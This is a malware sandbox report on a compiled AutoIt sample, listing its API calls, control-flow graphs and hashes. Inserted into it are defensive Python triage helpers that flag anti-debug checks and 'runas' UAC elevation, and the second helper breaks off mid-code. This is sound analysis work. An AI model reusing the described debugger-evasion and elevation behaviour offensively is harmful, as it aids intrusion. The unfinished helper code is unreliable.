                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                                                  • Opcode ID: 6bbbb51ae73f28d569a331e4c9625fcce867519793cc7df863c48ce62f3aa96b
                                                                                                                                                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6bbbb51ae73f28d569a331e4c9625fcce867519793cc7df863c48ce62f3aa96b
                                                                                                                                                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                  Strings
                                                                                                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                                                                  • runas, xrefs: 0042E2AD, 0042E2DC
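The API and string listing above is the AutoIt3 runtime stub starting up: it records its own path (GetModuleFileNameW, GetFullPathNameW), checks IsDebuggerPresent, can show the "This is a compiled AutoIt script" MessageBoxA, and can relaunch itself through ShellExecuteW with the "runas" verb, which is the UAC elevation path the report flags. The following triage helper is an added example, not code from the Joe Sandbox report or from AutoIt: it scans a binary for the marker strings shown above (the MessageBoxA text, the "AutoIt v3" window class, the "runas" verb, each searched as ANSI and as UTF-16LE because the W-suffixed APIs take wide strings) and classifies API-call lines in the report's own "APIs" format. The "AU3!EA06" signature is an assumption taken from public AutoIt documentation and YARA rules, not from this report, and the sample bytes and report lines are constructed, not the real 8EhMjL3yNF.exe.

```python
"""Triage helper for AutoIt-stub, anti-debug and elevation indicators.

Added example; not part of the Joe Sandbox report and not AutoIt code.
"""
import re
from typing import Dict, List

AUTOIT_MSG = (b"This is a compiled AutoIt script. AV researchers please email "
              b"avsupport@autoitscript.com for support.")

# Marker strings. Each is searched both as ANSI and as UTF-16LE, because the
# report shows an ANSI MessageBoxA text but W-suffixed APIs (ShellExecuteW,
# CreateWindowExW) for "runas" and the "AutoIt v3" window class.
STRING_MARKERS = {
    "autoit_stub_message": AUTOIT_MSG,
    "autoit_window_class": b"AutoIt v3",
    "runas_verb": b"runas",
    # Assumption: well-known AutoIt3 compiled-script resource signature from
    # public AutoIt documentation / YARA rules; it is not shown in this report.
    "au3_script_signature": b"AU3!EA06",
}

# API names grouped by what they mean for triage.
API_CATEGORIES = {
    "anti_debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                   "NtQueryInformationProcess"},
    "elevation_or_relaunch": {"ShellExecuteW", "ShellExecuteA", "ShellExecuteExW"},
    "self_location": {"GetModuleFileNameW", "GetModuleFileNameA", "GetFullPathNameW"},
    "dynamic_api_resolution": {"LoadLibraryA", "LoadLibraryW", "GetProcAddress"},
}

# Matches report lines such as "IsDebuggerPresent.KERNEL32 ref: 0040D5B6" and
# "ShellExecuteW.SHELL32(00000000), ref: 0042E2B9" (subcall lines included).
_API_LINE = re.compile(
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\([^)]*\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})")


def find_string_markers(blob: bytes) -> Dict[str, List[int]]:
    """Return {marker_name: [offsets]} for markers found as ANSI or UTF-16LE."""
    hits: Dict[str, List[int]] = {}
    for name, marker in STRING_MARKERS.items():
        offsets: List[int] = []
        for encoded in (marker, marker.decode("ascii").encode("utf-16-le")):
            start = 0
            while (pos := blob.find(encoded, start)) != -1:
                offsets.append(pos)
                start = pos + 1
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def parse_api_lines(report_text: str) -> List[dict]:
    """Parse the report's 'APIs' bullet lines into api/module/ref records."""
    calls = []
    for line in report_text.splitlines():
        m = _API_LINE.search(line)
        if m:
            calls.append({"api": m["api"], "module": m["module"],
                          "ref": m["ref"].upper(),
                          "subcall": "Part of subcall function" in line})
    return calls


def classify_apis(calls: List[dict]) -> Dict[str, set]:
    """Map each triage category to the API names from `calls` that fall in it."""
    found: Dict[str, set] = {}
    for call in calls:
        for category, names in API_CATEGORIES.items():
            if call["api"] in names:
                found.setdefault(category, set()).add(call["api"])
    return found


def triage(blob: bytes, report_text: str) -> dict:
    """Combine string markers and API categories into triage flags."""
    markers = find_string_markers(blob)
    categories = classify_apis(parse_api_lines(report_text))
    is_autoit = "autoit_stub_message" in markers or "au3_script_signature" in markers
    # Elevation is only flagged when the "runas" verb AND a ShellExecute call
    # are both present; either alone is a weak signal.
    elevates = "runas_verb" in markers and "elevation_or_relaunch" in categories
    return {"autoit_stub": is_autoit, "uac_elevation_attempt": elevates,
            "anti_debug": "anti_debug" in categories,
            "markers": markers, "api_categories": categories}


# Constructed sample data (not the bytes of the real 8EhMjL3yNF.exe).
SAMPLE_BLOB = (b"MZ" + b"\x00" * 62 + AUTOIT_MSG + b"\x00" * 8
               + "runas".encode("utf-16-le") + b"\x00\x00"
               + "AutoIt v3".encode("utf-16-le") + b"\x00\x00")

SAMPLE_REPORT = """\
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
"""

if __name__ == "__main__":
    result = triage(SAMPLE_BLOB, SAMPLE_REPORT)
    for key in ("autoit_stub", "uac_elevation_attempt", "anti_debug"):
        print(f"{key}: {result[key]}")
    for cat, names in sorted(result["api_categories"].items()):
        print(f"  {cat}: {sorted(names)}")
```

On a real sample, feed the PE's bytes and the report's "APIs" text to triage(); the string hits alone only establish the AutoIt stub, and the elevation flag deliberately requires both the "runas" string and a ShellExecute call, since the stub contains the verb whether or not the embedded script ever elevates.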
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadWindow$IconName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                                                                  • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                  • API String ID: 3436406043-3383388033
                                                                                                                                                                  • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                                  • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
Control-flow Graph
control_flow_graph 2006 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2015 40e582-40e583 2006->2015 2016 427674-427679 2006->2016 2019 40e585-40e596 2015->2019 2020 40e5ba-40e5cb call 40ef60 2015->2020 2017 427683-427686 2016->2017 2018 42767b-427681 2016->2018 2022 427693-427696 2017->2022 2023 427688-427691 2017->2023 2021 4276b4-4276be 2018->2021 2024 427625-427629 2019->2024 2025 40e59c-40e59f 2019->2025 2037 40e5ec-40e60c 2020->2037 2038 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2020->2038 2039 4276c6-4276ca GetSystemInfo 2021->2039 2022->2021 2029 427698-4276a8 2022->2029 2023->2021 2031 427636-427640 2024->2031 2032 42762b-427631 2024->2032 2027 40e5a5-40e5ae 2025->2027 2028 427654-427657 2025->2028 2033 40e5b4 2027->2033 2034 427645-42764f 2027->2034 2028->2020 2040 42765d-42766f 2028->2040 2035 4276b0 2029->2035 2036 4276aa-4276ae 2029->2036 2031->2020 2032->2020 2033->2020 2034->2020 2035->2021 2036->2021 2041 40e612-40e623 call 40efd0 2037->2041 2042 4276d5-4276df GetSystemInfo 2037->2042 2038->2037 2050 40e5e8 2038->2050 2039->2042 2040->2020 2041->2039 2047 40e629-40e63f call 40ef90 GetNativeSystemInfo 2041->2047 2052 40e641-40e642 FreeLibrary 2047->2052 2053 40e644-40e651 2047->2053 2050->2037 2052->2053 2054 40e653-40e654 FreeLibrary 2053->2054 2055 40e656-40e65d 2053->2055 2054->2055
APIs
• GetVersionExW.KERNEL32(?), ref: 0040E52A
• GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
• GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
• FreeLibrary.KERNEL32(?), ref: 0040E642
• FreeLibrary.KERNEL32(?), ref: 0040E654
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion
• String ID: 0SH
• API String ID: 3079510601-851180471
• Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
• Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
Control-flow Graph
control_flow_graph 2410 40ebd0-40ebd4 2411 40ebf6 2410->2411 2412 40ebd6-40ebe5 LoadLibraryA 2410->2412 2412->2411 2413 40ebe7-40ebf3 GetProcAddress 2412->2413 2413->2411
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
• Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
• Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
• Sleep.KERNEL32(0000000A,?), ref: 004094D1
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Message$Peek$DispatchSleepTranslate
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
• API String ID: 1762048999-758534266
• Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
• Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
• Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
• Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 00422643
• CreateFileW.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 0042267C
• GetLastError.KERNEL32 ref: 004226A0
• GetFileType.KERNELBASE(0040F7E9), ref: 004226BF
• GetLastError.KERNEL32 ref: 004226E4
• CloseHandle.KERNEL32(0040F7E9), ref: 004226F6
• CloseHandle.KERNEL32(0040F7E9), ref: 00422AAD
• CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000001,00000000), ref: 00422ACD
• GetLastError.KERNEL32 ref: 00422AD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: File$CreateErrorLast$CloseHandle$Type
• String ID: @$H
• API String ID: 352418905-104103126
• Opcode ID: a646307d57c18218cf2541d19adbe729ca7854e975d7805988412136e1a4be56
• Instruction ID: a6762e264ba116d74e69880979fe52a2e70c3e31e27682f651d8d28631669406
• Opcode Fuzzy Hash: a646307d57c18218cf2541d19adbe729ca7854e975d7805988412136e1a4be56
• Instruction Fuzzy Hash: F7223331B04225BBDF219F64EA417AE7BB0EF41304FA4452BE450DB2A1D7FC8981CB59
Control-flow Graph
APIs
• GetSysColorBrush.USER32(0000000F), ref: 004104C3
• RegisterClassExW.USER32(00000030), ref: 004104ED
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
• InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• LoadIconW.USER32(00400000,000000A9), ref: 00410542
• ImageList_ReplaceIcon.COMCTL32(009A0FF0,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                                                                  Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 0041039B
• LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
• LoadIconW.USER32(?,00000063), ref: 004103C0
• LoadIconW.USER32(?,000000A4), ref: 004103D3
• LoadIconW.USER32(?,000000A2), ref: 004103E6
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
• RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009A0FF0,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
• Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
• Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
• Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID: Default
• API String ID: 0-753088835
• Opcode ID: 2112c1e712c7154db348cf237cb694e9496d7972318c7e1e197a035869c5647c
• Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
• Opcode Fuzzy Hash: 2112c1e712c7154db348cf237cb694e9496d7972318c7e1e197a035869c5647c
• Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

Control-flow Graph (rendered graph not reproduced)

APIs
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileModuleName
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
• API String ID: 514040917-1609664196
• Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
• Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
• Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
• Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
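The per-function API listings and String ID fields above are the only structured data in these blocks, and when triaging a sample an analyst usually wants them as records to pivot on (which module a function calls into, which call sites take a resolved string, which functions carry interpreter markers) rather than as bullet text. The Python below is an added editor's example, not code from the Joe Sandbox report or from the sample: it parses lines in the exact shape printed here (`Function.MODULE(args), ref: address`, with the `Part of subcall function X:` prefix), decodes the 8-digit hex arguments and the `?` placeholders, splits String ID fields on `$` (the separator as inferred from the listings), and flags the AutoIt3 runtime markers that this sample's own strings contain (the `AutoIt v3 GUI` window class and the `/AutoIt3ExecuteScript`-style switches). The sample input is copied from the listings on this page; the helper names, the `ApiCall` record and the marker list are mine.

```python
import re
from dataclasses import dataclass
from typing import Optional, Union

# Constructed sample input: API lines copied from the function listings on this
# page, embedded here so the parser runs offline.
SAMPLE_APIS = """\
APIs
• GetSysColorBrush.USER32(0000000F), ref: 0041039B
• LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
• LoadIconW.USER32(?,00000063), ref: 004103C0
• RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
• CreatePopupMenu.USER32 ref: 00401204
"""

# String ID field copied from the GetModuleFileNameW function block above.
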